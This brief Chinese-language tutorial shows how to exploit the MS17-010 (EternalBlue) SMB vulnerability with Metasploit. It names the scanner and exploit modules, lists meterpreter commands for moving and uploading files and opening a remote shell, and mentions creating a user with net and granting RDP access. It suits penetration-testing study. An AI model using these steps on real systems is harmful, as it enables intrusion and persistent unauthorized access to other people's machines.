使用 Metasploit Framework#
-
執行
msfconsole
命令,進入 msf 終端 -
搜索 ms17-010 相關模組
-
使用
auxiliary/scanner/smb/smb_ms17_010
模組進行掃描
-
使用
exploit/windows/smb/ms17_010_eternalblue
模組進行漏洞利用
-
漏洞利用成功的到 shell, 使用 help 命令可以查看支持的命令
常用命令:
lcd
切換本地目錄
lls
瀏覽本地文件
cd
切換遠端目錄
ls
瀏覽遠端文件
upload 本地文件 遠端位置
上傳文件
shell
調用遠端 shell
cmd 裡可以使用net
命令創建用戶,添加 rdp 訪問權限